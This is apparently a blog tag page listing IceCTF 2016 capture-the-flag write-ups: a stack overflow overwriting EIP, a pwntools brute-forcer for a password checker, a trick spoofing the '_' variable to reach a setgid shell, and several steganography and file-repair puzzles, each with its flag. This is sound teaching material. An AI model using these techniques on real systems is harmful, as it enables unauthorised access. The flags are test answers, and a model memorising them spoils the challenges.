Articles tagged icectf2016

  1. IceCTF 2016 - ROPi


    Challenge description:

    Ritorno orientata programmazione nc ropi.vuln.icec.tf 6500

    The binary provided with the challenge was an x86 ELF. I started by reversing it with radare2:

    Feel free to stop the video above to look at the functions! The main function just calls ezy, which reads 0x40 bytes on top of a buffer that is 0x28 bytes in size. This means that we are running 0x18 bytes over the buffer. The first 4 bytes after those 0x28 overwrite the saved EBP and then the next 4 overwrite EIP. To test this theory we load up the binary in gdb and put in 0x28 bytes, plus BBBB to overwrite EBP, then iiii to overwrite EIP:

    ...


    Check out the full post for more details!

  2. IceCTF 2016 - A Strong Feeling


    Challenge description:

    Do you think you could defeat this password checker for us? It's making me real pissed off! /home/a_strong_feeling/ on the shell or download it here

    I started by loading the bin into radare2 and once I realized how big the main function was I just tried running it with input.

    It looks like the sentence returned is different the more characters we get right and the same if we get the same number wrong. I had the idea to write a python script with pwntools that ran the binary over and over until a different sentence was produced:

    from pwn import *
    import string
    charset = string.ascii_letters + string.digits + "{}_#"
    context.log_level = 'error'
    
    flag = "I"
    b = ELF("./strong_feeling")
    
    p = process(b.path)
    p.sendline(flag)
    out = p.recvall()
    
    while flag[-1] != '}':
        for c in charset:
            p = process(b.path)
            p.sendline(flag+c)
            newout = p.recvall()
            if newout != out:
                out = newout
                flag += c
                print flag
                continue
    

    The results were quite satisfying:

    Flag acquired

    IceCTF{pip_install_angr}

    And yes I realize now that this could have just been solved with angr, but this was a cool way to do it too!

  3. IceCTF 2016 - Blue Monday


    Challenge Description:

    Those who came before me lived through their vocations From the past until completion, they'll turn away no more And still I find it so hard to say what I need to say But I'm quite sure that you'll tell me just how I should feel today. A file download was given for this challenge. Running file yielded the following result:

    → file blue_monday.mid
    blue_monday.mid: Standard MIDI data (format 1) using 1 track at 1/220
    

    Assuming it actually was MIDI, I opened it up in audacity with no luck. It was just a bunch of constant tones. This was at about 2:30AM so as a last effort before bed I just catted the file:

    → cat blue_monday.mid
    MThdTrkId\Icd\ced\eCd\CTd\TFd\F{d\{Hd\HAd\Acd\ckd\k1d\1nd\n9d\9_d\_md\mUd\U5d\5Id\Icd\c_d\_Wd\W1d\17d\7hd\h_d\_md\mId\IDd\D1d\15d\5_d\_Ld\L3d\3td\t5d\5_d\_Hd\H4d\4vd\vEd\E_d\_ad\a_d\_rd\r4d\4vd\v3d\3}d\}h/
    

    The point of interest here for me was that it looked like the beginning was spelling IceCTF{ but with extra characters in between. I loaded it up into ipython and ended up with this snippet to solve it:

    with open("blue_monday") as f:
        print(''.join([i for i in f.read() if ord(i)<127 and ord(i)>0x10 and i!='\\' and i !='d'])[7:][:-2][::2])
    

    Basically this just removes any character that is non-ascii, a backslash, or d, and then cuts off the first 7 characters (the header) and the last 2, and then takes every other character. They had just embedded the flag into a working MIDI file it seems. Anyway, when you run this it prints the flag: IceCTF{HAck1n9_mU5Ic_W17h_mID15_L3t5_H4vE_a_r4v3}

  4. IceCTF 2016 - Corrupt Transmission


    Challenge description:

    We intercepted this image, but it must have gotten corrupted during the transmission. Can you try and fix it?

    For this challenge a file with the extension .png was provided. A common CTF challenge is to corrupt some part of an image, so the solution is to fix it! I started with the header. According to Wikipedia the file header is supposed to start with 89 50 4E 47 0D 0A 1A 0A. Looking at the file using xxd we can see that this png does not start with those bytes:

    → xxd corrupt_orig.png | head -1
    00000000: 9050 4e47 0e1a 0a1b 0000 000d 4948 4452  .PNG........IHDR
    

    The first byte and bytes 5-8 are wrong. To fix, I opened the image up in hexedit and changed the bytes to their correct values. Opening the file provided a valid image:

    flag

    And of course, the flag: IceCTF{t1s_but_4_5cr4tch}

  5. IceCTF 2016 - Demo


    Challenge description:

    I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell. The source for this challenge was provided:

    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <libgen.h>
    #include <string.h>
    
    void give_shell() {
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
        system("/bin/sh");
    }
    
    int main(int argc, char *argv[]) {
        if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
            give_shell();
        }
        else {
            printf("I'm sorry, your free trial has ended.\n");
        }
        return 0;
    }
    

    So to get the flag we need to make the _ shell variable equal icesh. The _ shell variable in bash is always set to the program name of the command being run. So I decided to use a different shell to see what would happen.

    sh
    ls icesh; /home/demo/demo
    cat flag.txt
    IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}
    

    And there we have our flag: IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}

  6. IceCTF 2016 - Thor is a hacker now


    Challenge description:

    Thor has been staring at this for hours and he can't make any sense out of it, can you help him figure out what it is?

    The text file provided is just a hexdump produced with xxd. xxd actually has a feature to reverse a hexdump back into the original file, from there I identified the resulting file's format with the file command. It was an lzip. Extracting the lzip resulted in the following image:

    thor

    Flag:

    IceCTF{h3XduMp1N9_l1K3_A_r341_B14Ckh47}

    Commands that were run in order:

     xxd -r thor.txt > thor.bin
    → file thor.bin
    thor.bin: lzip compressed data, version: 1
    lzip -d thor.bin
    → file thor.bin.out
    thor.bin.out: JPEG image data, JFIF standard 1.01
    → mv thor.bin.out thor.jpg
    
  7. IceCTF 2016 - Vape Nation


    Challenge description:

    Go Green!

    They provide a png called vape_nation.png:

    vape nation

    With the hint I figured it must be a green filter of some sort so I loaded up Stegsolve and checked out the green plane filters. Green plane 0 resulted in the following:

    solved nation

    Looks like a flag :)

    IceCTF{420_CuR35_c4NCEr}